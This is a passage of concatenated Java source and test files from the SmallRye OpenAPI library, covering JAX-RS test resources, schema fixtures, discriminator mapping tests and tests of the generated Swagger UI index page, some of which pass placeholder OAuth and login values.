import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
import org.jboss.resteasy.plugins.providers.multipart.MultipartOutput;
@Path(value = "pets")
public class ResponseMultipartGenerationTestResource {
@GET
@Consumes(value = MediaType.APPLICATION_JSON)
@Produces(value = "multipart/mixed")
@APIResponse(responseCode = "200")
@APIResponse(responseCode = "400", description = "Description 400")
public MultipartOutput getPetWithPicture() {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/PathParamWithFormParamsTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.ws.rs.Consumes;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.FormParam;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/path-param-with-form-params/{id}")
@SuppressWarnings(value = "unused")
public class PathParamWithFormParamsTestResource {
@PathParam(value = "id")
@DefaultValue(value = "12345")
@NotNull
@Size(min = 1, max = 12)
String id;
@FormParam(value = "form-param1")
private String formParam1;
@POST
@Consumes(value = MediaType.APPLICATION_FORM_URLENCODED)
@Produces(value = MediaType.APPLICATION_JSON)
public Widget update(@FormParam(value = "form-param2") @Size(max = 10) String formParam2,
@FormParam(value = "qualifiers") java.util.SortedSet<String> qualifiers) {
return null;
}
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/runtime/scanner/sorttest1/package-info.java<|end_filename|>
@OpenAPIDefinition(info = @Info(title = "Test", version = "1.0"), tags = {}, components = @Components(callbacks = {
@Callback(name = "DEF"),
@Callback(name = "XYZ"),
@Callback(name = "ABC")
}, examples = {
@ExampleObject(name = "DEF"),
@ExampleObject(name = "XYZ"),
@ExampleObject(name = "ABC")
}, headers = {
@Header(name = "DEF"),
@Header(name = "XYZ"),
@Header(name = "ABC")
}, links = {
@Link(name = "DEF"),
@Link(name = "XYZ"),
@Link(name = "ABC")
}, parameters = {
@Parameter(name = "DEF"),
@Parameter(name = "XYZ"),
@Parameter(name = "ABC")
}, requestBodies = {
@RequestBody(name = "DEF"),
@RequestBody(name = "XYZ"),
@RequestBody(name = "ABC")
}, responses = {
@APIResponse(name = "DEF"),
@APIResponse(name = "XYZ"),
@APIResponse(name = "ABC")
}, schemas = {
@Schema(name = "DEF"),
@Schema(name = "XYZ"),
@Schema(name = "ABC")
}, securitySchemes = {
@SecurityScheme(securitySchemeName = "DEF"),
@SecurityScheme(securitySchemeName = "XYZ"),
@SecurityScheme(securitySchemeName = "ABC")
}))
package io.smallrye.openapi.runtime.scanner.sorttest1;
import org.eclipse.microprofile.openapi.annotations.Components;
import org.eclipse.microprofile.openapi.annotations.OpenAPIDefinition;
import org.eclipse.microprofile.openapi.annotations.callbacks.Callback;
import org.eclipse.microprofile.openapi.annotations.headers.Header;
import org.eclipse.microprofile.openapi.annotations.info.Info;
import org.eclipse.microprofile.openapi.annotations.links.Link;
import org.eclipse.microprofile.openapi.annotations.media.ExampleObject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
import org.eclipse.microprofile.openapi.annotations.parameters.Parameter;
import org.eclipse.microprofile.openapi.annotations.parameters.RequestBody;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
import org.eclipse.microprofile.openapi.annotations.security.SecurityScheme;
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/KingCrimsonResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.ArrayList;
import java.util.List;
import javax.ws.rs.Consumes;
import javax.ws.rs.DELETE;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.PUT;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;
import org.eclipse.microprofile.openapi.annotations.media.Content;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
import org.eclipse.microprofile.openapi.annotations.parameters.RequestBody;
@Path(value = "/v1/kingcrimson")
@Produces(value = MediaType.APPLICATION_JSON)
@Consumes(value = MediaType.APPLICATION_JSON)
public class KingCrimsonResource extends BaseResource<KingCrimson> {
@GET
public ResultList<KingCrimson> getAll(@QueryParam(value = "id") String id, @QueryParam(value = "limit") int limit,
@QueryParam(value = "offset") int offset, @QueryParam(value = "orderby") List<String> orderBy) {
return super.getAll1();
}
@GET
@Path(value = "/noooooooo")
public Result<List<POJO>> getList() {
return new Result.ResultBuilder<List<POJO>>().status(200).result(new ArrayList<>()).build();
}
@POST
@RequestBody(content = @Content(schema = @Schema(implementation = KingCrimson.class)))
public Result<KingCrimson> post(KingCrimson deployment) {
return super.post1(deployment);
}
@PUT
@RequestBody(content = @Content(schema = @Schema(implementation = KingCrimson.class)))
public Result<KingCrimson> put(KingCrimson deployment) {
return super.put1(deployment);
}
@DELETE
@RequestBody(content = @Content(schema = @Schema(implementation = KingCrimson.class)))
public Response delete(KingCrimson deployment) {
return super.delete1(deployment);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/NoRolesResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.annotation.security.RolesAllowed;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.Response;
@Path(value = "/v1")
@SuppressWarnings(value = "unused")
public class NoRolesResource {
@GET
@Path(value = "secured")
@Produces(value = "application/json")
@RolesAllowed(value = { "admin" })
public Response getSecuredData(int id) {
return null;
}
}
<|start_filename|>ui/open-api-ui/src/test/java/io/smallrye/openapi/ui/IndexCreatorTest.java<|end_filename|>
package io.smallrye.openapi.ui;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertTrue;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import org.junit.jupiter.api.Test;
/**
* Check that the html gets created correctly
*
* @author <NAME> (<EMAIL>)
*/
class IndexCreatorTest {
@Test
void testCreateDefault() throws IOException {
byte[] indexHtml = IndexHtmlCreator.createIndexHtml();
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-feeling-blue.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertTrue(s.contains("url: '/openapi',"));
assertTrue(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
}
@Test
void testCreateVanilla() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.logoHref, null);
options.put(Option.themeHref, null);
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertFalse(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-feeling-blue.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertTrue(s.contains("url: '/openapi',"));
assertFalse(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
}
@Test
void testCreateWithStringBooleanOption() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.syntaxHighlight, "false");
options.put(Option.filter, "bla");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-feeling-blue.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertTrue(s.contains("url: '/openapi',"));
assertTrue(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
assertTrue(s.contains("filter: 'bla',"));
assertTrue(s.contains("syntaxHighlight: false,"));
}
@Test
void testCreateWithMultipleUrls() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.themeHref, ThemeHref.newspaper.toString());
Map<String, String> urls = new HashMap<>();
urls.put("Default", "/swagger");
urls.put("Production", "/api");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(urls, "Production", options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-newspaper.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertFalse(s.contains("url: '/openapi',"));
assertTrue(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
assertTrue(s.contains("urls: [{url: \"/api\", name: \"Production\"},{url: \"/swagger\", name: \"Default\"}],"));
assertTrue(s.contains("\"urls.primaryName\": 'Production',"));
}
@Test
void testCreateWithMultipleUrl() throws IOException {
Map<String, String> urls = new HashMap<>();
urls.put("Default", "/closeapi");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(urls, "Close", null);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-feeling-blue.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertTrue(s.contains("url: '/closeapi',"));
assertTrue(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
assertFalse(s.contains("urls.primaryName: 'Close',"));
}
@Test
void testCreateWithInitOAuth() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.oauthClientId, "your-client-id");
options.put(Option.oauthClientSecret, "your-client-secret-if-required");
options.put(Option.oauthRealm, "your-realms");
options.put(Option.oauthAppName, "your-app-name");
options.put(Option.oauthScopeSeparator, " ");
options.put(Option.oauthScopes, "openid profile");
options.put(Option.oauthAdditionalQueryStringParams, "{test: \"hello\"}");
options.put(Option.oauthUsePkceWithAuthorizationCodeGrant, "true");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("clientId: 'your-client-id'"));
assertTrue(s.contains("clientSecret: 'your-client-secret-if-required'"));
assertTrue(s.contains("realm: 'your-realms'"));
assertTrue(s.contains("appName: 'your-app-name'"));
assertTrue(s.contains("scopeSeparator: ' '"));
assertTrue(s.contains("scopes: 'openid profile'"));
assertTrue(s.contains("additionalQueryStringParams: {test: \"hello\"}"));
assertTrue(s.contains("usePkceWithAuthorizationCodeGrant: true"));
}
@Test
void testCreateWithPreauthorizeBasic() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.preauthorizeBasicAuthDefinitionKey, "basicAuth");
options.put(Option.preauthorizeBasicUsername, "username");
options.put(Option.preauthorizeBasicPassword, "password");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("ui.preauthorizeBasic('basicAuth', 'username', 'password');"));
}
@Test
void testCreateWithPreauthorizeApiKey() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.preauthorizeApiKeyAuthDefinitionKey, "api_key");
options.put(Option.preauthorizeApiKeyApiKeyValue, "<KEY>");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("ui.preauthorizeApiKey('api_key', '<KEY>');"));
}
@Test
void testCreateWithPreauthorizeBoth() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.preauthorizeBasicAuthDefinitionKey, "basicAuth");
options.put(Option.preauthorizeBasicUsername, "username");
options.put(Option.preauthorizeBasicPassword, "password");
options.put(Option.preauthorizeApiKeyAuthDefinitionKey, "api_key");
options.put(Option.preauthorizeApiKeyApiKeyValue, "<KEY>");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("ui.preauthorizeApiKey('api_key', '<KEY>');"));
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("ui.preauthorizeBasic('basicAuth', 'username', 'password');"));
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BaseResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.core.Response;
public abstract class BaseResource<T extends BaseModel> {
protected ResultList<T> getAll1() {
return new ResultList.ResultBuilder<T>().status(200).build();
}
protected Result<T> post1(T t) {
return new Result.ResultBuilder<T>().status(200).build();
}
protected Result<T> put1(T e) {
return new Result.ResultBuilder<T>().status(200).build();
}
protected Response delete1(T t) {
return Response.status(Response.Status.NO_CONTENT).build();
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/XmlTransientField.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.xml.bind.annotation.XmlTransient;
public class XmlTransientField {
@XmlTransient
String prop1Field;
String prop2Field;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ServerError.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class ServerError {
String description;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/UserImpl.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
@Schema
public class UserImpl extends BaseUser implements User {
@Schema(description = "The user identifier", minimum = "15")
public Integer getId() {
return 0;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/XmlTransientField.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.xml.bind.annotation.XmlTransient;
public class XmlTransientField {
@XmlTransient
String prop1Field;
String prop2Field;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ExceptionHandler2.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.NotFoundException;
import javax.ws.rs.core.Response;
import javax.ws.rs.ext.ExceptionMapper;
import javax.ws.rs.ext.Provider;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
@Provider
public class ExceptionHandler2 implements ExceptionMapper<NotFoundException> {
@Override
@APIResponse(responseCode = "404", description = "Not Found")
public Response toResponse(NotFoundException e) {
return null;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/JAXBElementDto.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlElementRef;
import javax.xml.bind.annotation.XmlType;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
@Schema
@XmlAccessorType(value = XmlAccessType.FIELD)
@XmlType(name = "JAXBElementDto", propOrder = { "caseSubtitleFree", "caseSubtitle" })
public class JAXBElementDto {
@XmlElementRef(name = "CaseSubtitle", namespace = "urn:Milo.API.Miljo.DataContracts.V1", type = JAXBElement.class, required = false)
protected JAXBElement<String> caseSubtitle;
@XmlElementRef(name = "CaseSubtitleFree", namespace = "urn:Milo.API.Miljo.DataContracts.V1", type = JAXBElement.class, required = false)
protected JAXBElement<String> caseSubtitleFree;
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/AbstractAnimal.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
/* Test models and resources below. */
@com.fasterxml.jackson.annotation.JsonPropertyOrder(value = { "age", "type" })
public abstract class AbstractAnimal {
@Schema
private String type;
protected Integer age;
private boolean extinct;
@Schema(name = "pet_type", required = true)
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
public int getAge() {
return age;
}
public void setAge(int age) {
this.age = age;
}
@Schema
public Boolean isExtinct() {
return extinct;
}
public void setExtinct(boolean extinct) {
this.extinct = extinct;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/KingCrimson.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.Date;
import javax.json.bind.annotation.JsonbDateFormat;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class KingCrimson extends BaseModel {
public enum Status {
unknown,
success,
failure
}
@JsonbDateFormat(value = "yyyy-MM-dd'T'HH:mm:ss[.SSS]X")
@Schema(implementation = String.class, format = "date-time")
Date timestamp;
Magma environment;
Status status;
public Date getTimestamp() {
return timestamp;
}
public void setTimestamp(Date timestamp) {
this.timestamp = timestamp;
}
public Magma getEnvironment() {
return environment;
}
public void setEnvironment(Magma environment) {
this.environment = environment;
}
public Status getStatus() {
return status;
}
public void setStatus(Status status) {
this.status = status;
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/DiscriminatorMappingTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class DiscriminatorMappingTests extends IndexScannerTestBase {
@Test
void testJavaxDiscriminatorFullDeclaredInResponse() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorFullDeclaredInResponseTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorFullDeclaredInResponse() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorFullDeclaredInResponseTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorNoMappingTestResource() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorNoMappingTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorNoMappingTestResource() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorNoMappingTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorMappingNoSchema() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping-schema.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorMappingNoSchemaTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorMappingNoSchema() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping-schema.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorMappingNoSchemaTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorMappingNoKey() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping-key.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorMappingNoKeyTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorMappingNoKey() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping-key.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorMappingNoKeyTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorMappingEmptyMapping() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-empty-mapping.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorMappingEmptyMappingTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorMappingEmptyMapping() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-empty-mapping.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorMappingEmptyMappingTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorMappingNoPropertyName() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-property-name.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorMappingNoPropertyNameTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorMappingNoPropertyName() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-property-name.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorMappingNoPropertyNameTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/JacksonPropertyOrderCustomName.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
@com.fasterxml.jackson.annotation.JsonPropertyOrder(value = { "theName", "comment2ActuallyFirst", "comment" })
public class JacksonPropertyOrderCustomName {
@com.fasterxml.jackson.annotation.JsonProperty(value = "theName")
String name;
String name2;
String comment;
@com.fasterxml.jackson.annotation.JsonProperty(value = "comment2ActuallyFirst")
String comment2;
public String getComment() {
return comment;
}
public String getName() {
return name;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/models/examples/ExampleImpl.java<|end_filename|>
package io.smallrye.openapi.api.models.examples;
import org.eclipse.microprofile.openapi.models.examples.Example;
import io.smallrye.openapi.api.constants.OpenApiConstants;
import io.smallrye.openapi.api.models.ExtensibleImpl;
import io.smallrye.openapi.api.models.ModelImpl;
/**
* An implementation of the {@link Example} OpenAPI model interface.
*/
public class ExampleImpl extends ExtensibleImpl<Example> implements Example, ModelImpl {
private String ref;
private String summary;
private String description;
private Object value;
private String externalValue;
/**
* @see org.eclipse.microprofile.openapi.models.Reference#getRef()
*/
@Override
public String getRef() {
return this.ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.Reference#setRef(java.lang.String)
*/
@Override
public void setRef(String ref) {
if (ref != null && !ref.contains("/")) {
ref = OpenApiConstants.REF_PREFIX_EXAMPLE + ref;
}
this.ref = ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#getSummary()
*/
@Override
public String getSummary() {
return this.summary;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#setSummary(java.lang.String)
*/
@Override
public void setSummary(String summary) {
this.summary = summary;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#getDescription()
*/
@Override
public String getDescription() {
return this.description;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#setDescription(java.lang.String)
*/
@Override
public void setDescription(String description) {
this.description = description;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#getValue()
*/
@Override
public Object getValue() {
return this.value;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#setValue(java.lang.Object)
*/
@Override
public void setValue(Object value) {
this.value = value;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#getExternalValue()
*/
@Override
public String getExternalValue() {
return this.externalValue;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#setExternalValue(java.lang.String)
*/
@Override
public void setExternalValue(String externalValue) {
this.externalValue = externalValue;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/scanner/spi/ScannerSPILogging.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner.spi;
import org.jboss.logging.Logger;
import org.jboss.logging.annotations.LogMessage;
import org.jboss.logging.annotations.Message;
import org.jboss.logging.annotations.MessageLogger;
@MessageLogger(projectCode = "SROAP", length = 5)
interface ScannerSPILogging { // NOSONAR (use of constants in an interface)
ScannerSPILogging log = Logger.getMessageLogger(ScannerSPILogging.class, ScannerSPILogging.class.getPackage().getName());
@LogMessage(level = Logger.Level.WARN)
@Message(id = 7900, value = "Value '%s' is not a valid %s default")
void invalidDefault(String segment, String primitive);
@LogMessage(level = Logger.Level.WARN)
@Message(id = 7901, value = "Matrix parameter references missing path segment: %s")
void missingPathSegment(String segment);
}
<|start_filename|>ui/open-api-ui/src/main/java/io/smallrye/openapi/ui/HttpMethod.java<|end_filename|>
package io.smallrye.openapi.ui;
/**
* List of HTTP methods that have the "Try it out" feature enabled. An empty array disables "Try it out" for all operations.
* This does not filter the operations from the display.
*
* @author <NAME> (<EMAIL>)
*/
public enum HttpMethod {
get,
put,
post,
delete,
options,
head,
patch,
trace
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ExtensionParsingTestResource1.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.callbacks.Callback;
import org.eclipse.microprofile.openapi.annotations.callbacks.CallbackOperation;
import org.eclipse.microprofile.openapi.annotations.callbacks.Callbacks;
import org.eclipse.microprofile.openapi.annotations.enums.SchemaType;
import org.eclipse.microprofile.openapi.annotations.extensions.Extension;
import org.eclipse.microprofile.openapi.annotations.media.Content;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
/* Test models and resources below. */
@Path(value = "/ext-custom")
public class ExtensionParsingTestResource1 {
@POST
@Consumes(value = MediaType.TEXT_PLAIN)
@Produces(value = MediaType.TEXT_PLAIN)
